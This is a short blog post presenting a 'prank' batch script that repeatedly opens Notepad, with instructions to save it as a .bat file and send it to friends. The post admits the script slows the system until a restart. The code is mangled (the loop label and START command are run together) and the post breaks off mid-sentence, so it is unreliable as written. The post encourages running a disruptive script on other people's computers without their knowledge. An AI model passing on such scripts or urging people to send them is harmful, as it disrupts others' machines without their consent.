NOTEPAD TRICK TO OPEN NOTEPAD CONTINUOSLY

Posted by Latest Computer Tips and Tricks On 0 comments

This simple computer prank consists of a code below that will drive your friend crazy as it opens notepad continuously.When you type the below code and rename it as *.bat it take the above showed icon shape.To Open Notepad continuously in your friend’s Computer:
Type the code in notepad as (or) Simply copy the code and paste in notepad

@ECHO off
:topSTART %SystemRoot%\system32\notepad.exe
GOTO top


Save it as “notepad.BAT” and send it your friends :))
Note: If you want to try it, then go ahead and when you built this file double click to open it. But beware it slows your system and you will be left with no other option than to restart, as this script opens 100’s of notepad window. So, If you want to try this than

0 comments:

Post a Comment